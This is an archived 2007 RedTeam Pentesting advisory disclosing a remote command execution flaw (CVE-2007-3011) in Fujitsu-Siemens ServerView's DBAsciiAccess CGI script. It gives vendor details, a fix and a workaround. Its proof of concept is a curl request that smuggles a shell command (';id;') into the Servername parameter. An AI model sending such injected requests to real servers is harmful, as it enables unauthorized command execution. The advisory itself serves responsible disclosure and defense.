AOH :: HP Unsorted F :: TB11510.HTM

Fujitsu-Siemens ServerView Remote Command Execution



Fujitsu-Siemens ServerView Remote Command Execution
Fujitsu-Siemens ServerView Remote Command Execution



--nextPart2932801.CleF34fEPk
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Advisory: Fujitsu-Siemens ServerView Remote Command Execution

RedTeam Pentesting discovered a remote command execution in the Fujitsu-
Siemens ServerView during a penetration test. The DBAsciiAccess CGI
script is vulnerable to a remote command execution because of a
parameter which is not properly sanitized. An attacker may run arbitrary
commands on the server with the permissions of the webserver user.


Details
======
Product: Fujitsu Siemens Computers ServerView
Affected Versions: < 4.50.09
=46ixed Versions: 4.50.09
Vulnerability Type: Remote Command Execution
Security-Risk: high
Vendor-URL: 
http://www.fujitsu-siemens.com/products/standard_servers/system_management/control.html 
Vendor-Status: informed, fixed version released
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-002.php 
Advisory-Status: public
CVE: CVE-2007-3011
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3011 


Introduction
===========
"ServerView provides asset management tools for automated analysis and
version maintenance. It also supports the tracking of system
installation and status by collecting inventory data. Because they are
stored centrally, archives can be readily compared to a master version
to trace changes over time and highlight differences with the original
setup."

(from the vendor's homepage)


More Details
===========
ServerView has a Remote Command Execution in its Webinterface. The
DBAsciiAccess CGI script provides a "ping" functionality.  In the
subparameter "Servername" of the parameter "Parameterlist" of this
script, the IP address to be pinged is given. This IP address will be
given as a parameter to the ping program without further sanitization.
By adding a trailing semicolon after the IP, an attacker can add
arbitrary shell commands which will be executed with the permissions of
the webserver user.


Proof of Concept
===============
The following URL was wrapped for better readability.

curl
"http://www.example.com/cgi-bin/ServerView/ 
       SnmpView/DBAsciiAccess
       ?SSL       &Application=ServerView/SnmpView
       &Submit=Submit
       &UserID=1
       &Profile       &DBAccess=ASCII
       &Viewing=-1
       &Action=Show
       &ThisApplication=TestConnectivityFrame
       &DBElement=ServerName
       &DBValue=bcmes
       &DBList=snism
       &UserValue       &DBTableList=SERVER_LIST
       &Sorting       &ParameterList=What--primary,,
                      OtherCommunity--public,,
                      SecondIP--,,
                      Timeout--5,,
                      Community--public,,
                      ServerName--bcmes,,
                      Servername--127.0.0.1;id;,,       # vulnerable parameter
                      SType--Server"



Workaround
=========
Block access to the ServerView web interface for all untrusted users.


=46ix
==
Version 4.50.09 of the linux agent fixes the problem. It can be downloaded 
with
the SW-ID: 1013988 under

http://www.fujitsu-siemens.com/support 

=46ujitsu-Siemens decided to make a silent fix, as the vulnerability is not
mentioned in the comments of the patch. They told RedTeam Pentesting that it
is fixed in this version, though.


Security Risk
============
The security risk is high. An attacker is able to execute arbitrary
commands on the server with the permissions of the webserver user. 


History
======
2007-05-07 First contact with vendor. No one who is responsible found,
           contact will call back with further information.
2007-05-08 A responsible contact for the product is found and gets the
           advisory
2007-05-09 The vulnerability gets acknowledged as not being known
           before. A fix is being worked on.
2007-06-18 CVE number assigned
2007-07-04 Vendor releases fixed version
2007-07-04 Advisory released


RedTeam Pentesting GmbH
======================
RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks or products are
uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de. 

=2D- 
RedTeam Pentesting GmbH                    Tel.: +49 241 963-1300
Dennewartstr. 25-27                        Fax : +49 241 963-1304
52068 Aachen http://www.redteam-pentesting.de/ 
Germany                         Registergericht: Aachen HRB 14004
Gesch=E4ftsf=FChrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck

--nextPart2932801.CleF34fEPk
Content-Type: application/pgp-signature; name=signature.asc 
Content-Description: This is a digitally signed message part.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iQEVAwUARoud89G/HXWsgFSuAQpfFAgAvLtNH2T8vxKuEavcDd7Yh9t3DXrahCje
/9HSLdZxz5OlYJP92EsEYq9WKwusZVg7MR8JDb/kfqqABjPaFI36024ij32x8Gz0
1mC+56RPsEXFFAlg4bqtfJPTwEGHSwtFaB+RGFkJNY/YJhLahXwD1svpFXKDg3jG
GXbymgISsrCxFs2sHACfzdLfZ7PY10yj5E90EVKDVV5B7uPdE9dhqbgf5/8M3TPy
eNleuzhlks6dnKgqNrseJr7+XknIJnO260yPhKiChQGQOF/joWtxEAXhuAYfnXDD
gIusNUO6ELWHoxPn5MoZz8T1YJUn749tzl7ljdmnLsljDM5EabVlrw==hNDL
-----END PGP SIGNATURE-----

--nextPart2932801.CleF34fEPk--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.